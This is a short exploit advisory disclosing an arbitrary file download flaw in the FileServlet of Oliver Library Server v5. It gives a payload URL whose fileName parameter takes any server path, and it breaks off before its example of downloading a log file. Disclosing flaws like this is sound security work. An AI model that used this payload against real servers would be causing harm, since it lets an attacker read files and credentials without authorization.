Authored by Ishaan Vij, Mandeep Singh, CTRL Group, Luke Blues

Oliver Library Server 5 versions prior to suffer from an arbitrary file download vulnerability.

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage:
# Product: Oliver Server v5
# Version: <
# Tested on: Windows Server 2016

Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.

Steps to Exploit:

1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>

2) Example to download iis.log file: